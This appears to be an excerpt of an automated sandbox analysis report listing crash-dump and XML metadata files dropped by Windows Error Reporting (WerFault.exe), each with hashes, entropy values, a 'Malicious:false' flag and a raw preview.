                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.6.1.2.<./.P.i.

                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERB2F3.tmp.xml

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):4720
                                                Entropy (8bit):4.495498441898633
                                                Encrypted:false
                                                SSDEEP:48:cvIwWl8zsPJg77aI9uxWpW8VYNYm8M4JqtFQkLW+q8v2Me7Bsd:uIjfxI70g7VdJUWKu7Bsd
                                                MD5:F3D1936C176102C213845B3E37FF30CE
                                                SHA1:2C8E5EF6FF1AA134F978BFF6F579E8DBF4DFAA89
                                                SHA-256:AEFBC264E73FC8858DCDB42AFF5FAD2C2CACC91B345311A14AB64C3C4512AC66
                                                SHA-512:AD8B8AF60C448100A9F9B32FF31735350E3CC70C8C13ED439FD9B1F405079DA4D53B379B6FC930BF1CC2987D0B28D7493AE0FF6F757307AB70CA3B7C22725FF5
                                                Malicious:false
                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="670815" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERB553.tmp.dmp

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Mini DuMP crash report, 14 streams, Sat Jan 11 05:12:43 2025, 0x1205a4 type
                                                Category:dropped
                                                Size (bytes):104038
                                                Entropy (8bit):2.039930507734341
                                                Encrypted:false
                                                SSDEEP:384:1W4RmWg6m7ej7oxXAdCQlGAZs4Uj7ExK2MhHf0LEBwl9AcRQyaV:jRmWgd7S4XAdDQAZxu7wK2MhzqTiV
                                                MD5:995C3EBB010404688320EE83DB0C4A79
                                                SHA1:4349CED199888489990A4097E948645C45BCD40F
                                                SHA-256:77D627C4BAD9D89021DDA1F9486CC06B41C1ABF56EA6262A87E7C16C81CF7DE3
                                                SHA-512:1D212B1D18AF25E7A1A8B65BFF342AAEF4F052FD6EC2315302BB2A248D0649172F39A54B2AB6B6D7505EF588A54EB53F119EF41055BBE3F44F64D2950DF23AF3
                                                Malicious:false
                                                Preview:MDMP..a..... ..........g....................................t...\F..........T.......8...........T............+...j......................................................................................................eJ......x.......GenuineIntel............T.......L......g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERB7B5.tmp.WERInternalMetadata.xml

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):8414
                                                Entropy (8bit):3.700060520868702
                                                Encrypted:false
                                                SSDEEP:192:R6l7wVeJLpu962Ue6Y2DUSU9RHSgmfppdaWpBG89bAOsfPgm:R6lXJLK6E6YJSU9RygmfpjNANfd
                                                MD5:0DAF2C1DCF1BFF0BB4C8E4DF618A123D
                                                SHA1:7EFDD15FF87FECD8A02C5E82179024E83B58E411
                                                SHA-256:A2C82DD205A78C29F620E5FDDFA9FBC12B32B34B76DB652DF3D71F5B5885C811
                                                SHA-512:A866691BBF5F44D145D85FF9107BDBD0A3538E266FBAB281E352963E0B9AD86E90F3B52B5D59D58CCD1466DC1DEA4C64594E54DED39021F6F8EEC90758F62BA3
                                                Malicious:false
                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.6.1.2.<./.P.i.

                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERB833.tmp.xml

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):4720
                                                Entropy (8bit):4.495371140555508
                                                Encrypted:false
                                                SSDEEP:48:cvIwWl8zsPJg77aI9uxWpW8VYqJYm8M4JqtFyC+q8v2Me7Bsd:uIjfxI70g7VwJ0Ku7Bsd
                                                MD5:71AAB51259B477F9490F98F8F2AF875B
                                                SHA1:784DBEE83B0ABCE6EAB382B88428786D4AB44F39
                                                SHA-256:051F87C6BA316BE34ECD35A392F09D901D2F34F2307271E7863D40427E85ACF1
                                                SHA-512:43C00872B1EDA245C32EC8494FA0774816C0C3DE64E9C09015A49C34D85E7D422C51418E28D08ECC7D7566D5F8A1931C0704F74EA0BB17BAE13B4CA91E29A8D9
                                                Malicious:false
                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="670815" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERBA73.tmp.dmp

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Mini DuMP crash report, 14 streams, Sat Jan 11 05:12:44 2025, 0x1205a4 type
                                                Category:dropped
                                                Size (bytes):103614
                                                Entropy (8bit):2.0503303956664203
                                                Encrypted:false
                                                SSDEEP:384:t8q2Wgwm7+U4p9oF4A0T14lGAF4Uj7ExK2MhkF0rxWwmG2u3Fvia:f2Wgf7+UV4A0Z4QAuu7wK2MhnxK3MH
                                                MD5:20D3272749611B35E3264A6B8A87AA5B
                                                SHA1:E805C886D163CD2A6DB91916372648FDD51D085A
                                                SHA-256:F9BF78EE8CAEB1D79C75706F22797AF0009DDF967A727A6FAFF1043BB34FE383
                                                SHA-512:EAB35FC69F563D5EA7639EDCD583E047746E1E88A3E656460ECA812D33B87BEF05EEC09AA5BD0976AF02D0C166F35D2DBA8B7CBA7A4EF4DDC7055D02605DFBE5
                                                Malicious:false
                                                Preview:MDMP..a..... ..........g........................................\F..........T.......8...........T............+...h......................................................................................................eJ......x.......GenuineIntel............T.......L......g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERBB30.tmp.WERInternalMetadata.xml

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):8414
                                                Entropy (8bit):3.699361286644949
                                                Encrypted:false
                                                SSDEEP:192:R6l7wVeJLpuu6M6Y2DDSU9MHSgmfppdaWpB089bJOsfugmjm:R6lXJLp6M6Y+SU9MygmfpjzJNftj
                                                MD5:4904D8E8FB2357E3555AD5284AD7D6BD
                                                SHA1:EB78239811BA7555CB9019BFAE855E5850EF988B
                                                SHA-256:BC3285082A16A71FFC85C390836628E8D2D4B6ECA197DFAC1EFFB366981EDF19
                                                SHA-512:A665614A7B82CCFF005473A09AC8A303E73F05699A984B30437FD0F2CF72D2046E521F929B98531A1A2B4F917E4FAC08219ABD0814FD12F8F523CE52AA9815A4
                                                Malicious:false
                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.6.1.2.<./.P.i.

                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERBB6F.tmp.xml

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):4720
                                                Entropy (8bit):4.4960008783251935
                                                Encrypted:false
                                                SSDEEP:48:cvIwWl8zsPJg77aI9uxWpW8VYtPYm8M4JqtFzv+q8v2Me7Bsd:uIjfxI70g7VwSJAKu7Bsd
                                                MD5:01942366E3EB92115B2429595A4AE298
                                                SHA1:1A23B3FAC6CE126025FC5D7F5B63194EB94A2BDE
                                                SHA-256:FF55BC6AC259CD4A1F3D90FCACCAF76F38A72438618BC3B343B97F2E6AD10E77
                                                SHA-512:6688EAFC5AEDBBC7CA59B74A5382218A4F2DCEA920518F61DEFE3610288527E89658C95A4CF22FEE69C41604815EEC4BE096A76A1A83156B2AD301FCF995B2CF
                                                Malicious:false
                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="670815" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERBDCE.tmp.dmp

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Mini DuMP crash report, 14 streams, Sat Jan 11 05:12:45 2025, 0x1205a4 type
                                                Category:dropped
                                                Size (bytes):112404
                                                Entropy (8bit):2.214911743334178
                                                Encrypted:false
                                                SSDEEP:768:xWg37v24A04iO64SlQAsfq7wK2Mhx48NQ:oGA0xO64SCnq7wc+WQ
                                                MD5:7B9DBB79BAB37C99AC03B9B03884D830
                                                SHA1:133187FA5771F0301870CFEA3852F34F1B67675E
                                                SHA-256:12399E446D82E7584450ADFDF576A2A0BBC135911991BE341C0D3B61BF063891
                                                SHA-512:DB0777FA2D7CCF68C76159E598B06605BD50C3F882148BBE53F318E00C5997A220A646B83883417E6FE7E0EBC0ABA822D09307FE531F2823EF33A1DCAF4A3AEA
                                                Malicious:false
                                                Preview:MDMP..a..... ..........g........................................\F..........T.......8...........T............-..........................................................................................................eJ......x.......GenuineIntel............T.......L......g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERBEF8.tmp.WERInternalMetadata.xml

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):8414
                                                Entropy (8bit):3.6990182772830558
                                                Encrypted:false
                                                SSDEEP:192:R6l7wVeJLpu46tq6Y2DMSU9MHSgmfppdaWpBT89bJOsf+Ljm:R6lXJLf6tq6YxSU9MygmfpjGJNfn
                                                MD5:04E1D174FD926615CCBDBA41D473F3E8
                                                SHA1:1672DF6D339719B74142FDDC429596198B659F9F
                                                SHA-256:F5AF36B0EFC34BB59BBBC93B2FC6C490CCA9A8AB091A881E638A666DAD50862D
                                                SHA-512:7C733E44499A3535D325965DF2C6C9DA7BB8D005E57300C207773DF2FD30318EDE4424BC5BA053AF472BBFF31B9044840A2A4DB707894BFA00D4291D0C8DD0C0
                                                Malicious:false
                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.6.1.2.<./.P.i.

                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERBF19.tmp.xml

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):4720
                                                Entropy (8bit):4.4937417346332165
                                                Encrypted:false
                                                SSDEEP:48:cvIwWl8zsPJg77aI9uxWpW8VYjvYm8M4JqtFtEp+q8v2Me7Bsd:uIjfxI70g7V3JSEpKu7Bsd
                                                MD5:4AB1131E06C8F12B6D8412C177BCEC8D
                                                SHA1:B16DF7871616B77FEAA1168206AC1E1BCFC456AF
                                                SHA-256:285A39536D0FF2F0C1B5CC8B18E3B8A8E0194BF39A8BA7483926CA90EAB2679A
                                                SHA-512:ED5E9F696842F14840330AE7B1A22C5DF34AE97B47708B5A4B55FA6D8C7AAE7A7309B22C5AF3C89D4962AFD2137890E57EB7A899969C0BC1198B129A6FB21BD4
                                                Malicious:false
                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="670815" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERC427.tmp.dmp

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Mini DuMP crash report, 14 streams, Sat Jan 11 05:12:47 2025, 0x1205a4 type
                                                Category:dropped
                                                Size (bytes):42380
                                                Entropy (8bit):2.732038951321124
                                                Encrypted:false
                                                SSDEEP:192:CMP8XDXYywJX/b9CtDzpROmlUt2kIBgTMG81AN2M/Hx7pjok1lJYafhwlxmxTC3K:bywVb4Bzm71IBOMxK2MfhYjx8TSi9
                                                MD5:8039C00908EF53768DBC2948F8C48DE6
                                                SHA1:9BAA92E3412B04317BF81C3FCAE8A43DD925F018
                                                SHA-256:8933DDB67E5F7B2F6E6FC1A95C77E7B154F158426D6FACDF90C630A276D58ACA
                                                SHA-512:36E9906DD39986DEA31A5424EBD7BF29194AB2A58047A6C51276F5FDE2568039C51E4DEF88EE06FF8529426B442D0D42D68EA93C04C61B02D9317018F429CA10
                                                Malicious:false
                                                Preview:MDMP..a..... ..........g............4...............<...........<...........T.......8...........T...........p1...t..........L...........8!..............................................................................eJ.......!......GenuineIntel............T.......L......g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERC571.tmp.WERInternalMetadata.xml

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):8316
                                                Entropy (8bit):3.6954953522164913
                                                Encrypted:false
                                                SSDEEP:192:R6l7wVeJLpuX6IJC6Y2DgOSU9RHwgmfMpophxWpD+89b7OsfHPJm:R6lXJLY6IJC6Y1OSU9RQgmfM2vK7NfHc
                                                MD5:3A282029DD47C6936BFEEC306B04A831
                                                SHA1:41DEAF7838B5B4CE23744D27530AC9A7B360D6CA
                                                SHA-256:2E135D8C4D41FB58DAB8758D2EDB379A7794D5867300434A984DEF57DB21DF37
                                                SHA-512:2EC61B03AE927BF491AAD489E8DC644B89BA3B035BB0E48C168DBCC7A2A536160CCDFC72B4AC60C61F520C6183C901E4CD0C0922A77D7E178D90ACAC08DE55E5
                                                Malicious:false
                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.6.1.2.<./.P.i.

                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERC591.tmp.xml

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):4579
                                                Entropy (8bit):4.479985360022542
                                                Encrypted:false
                                                SSDEEP:48:cvIwWl8zsPJg77aI9uxWpW8VYoYm8M4JqPFt+q8CEe7Bsd:uIjfxI70g7VoJMt7Bsd
                                                MD5:25CAEE5052FB18969BF8C7A8B91BDFBD
                                                SHA1:76CA124881E32E8AD33443DAA7C9C9AE20BDB252
                                                SHA-256:1945FCB8F7D312D7AE3F29D28181E19781F6E99BB71109F6FAD8622770933F7F
                                                SHA-512:DDC691263B8FF3A02805457A1B8B52457E5A9E52F69B13331BD53BFE075DE38A1598055BD4EE82683D10C605E06D7224989B58029089F40278EC3220C32003AF
                                                Malicious:false
                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="670815" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERC977.tmp.dmp

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Mini DuMP crash report, 14 streams, Sat Jan 11 05:12:48 2025, 0x1205a4 type
                                                Category:dropped
                                                Size (bytes):62046
                                                Entropy (8bit):2.2027203591895597
                                                Encrypted:false
                                                SSDEEP:384:QsucehtgeAxalpZ5D/+j2Mh0PlelqKQcDaRq:xuLhtgezyj2MqElqr
                                                MD5:44A4D7029E6AF907FFB16E120474BAF6
                                                SHA1:7AB008EC96A927B6241891F80A87B58B42051CD7
                                                SHA-256:FB961C23891DF8D79C06928405F975A4017D083632D9A8FD87B557B7E3507B1D
                                                SHA-512:C1CF238BA6A5556C73F3572FD879CB2B1BEE5808C75162D02C1CBA81A100D2C60BA0CDAF7E927E6330EB3763EE6075CECF4C40163C5EA4D072D3C94F7CC0E8ED
                                                Malicious:false
                                                Preview:MDMP..a..... ..........g.........................................1..........T.......8...........T...........0...........................................................................................................eJ......<.......GenuineIntel............T..............g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERCA24.tmp.WERInternalMetadata.xml

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):8396
                                                Entropy (8bit):3.6966883208192196
                                                Encrypted:false
